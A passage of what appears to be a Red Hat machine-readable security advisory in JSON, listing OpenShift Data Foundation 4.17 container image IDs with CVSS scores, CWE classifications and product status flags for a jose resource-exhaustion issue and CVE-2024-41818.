"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jose: resource exhaustion"
},
{
"cve": "CVE-2024-41818",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-29T16:24:42+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
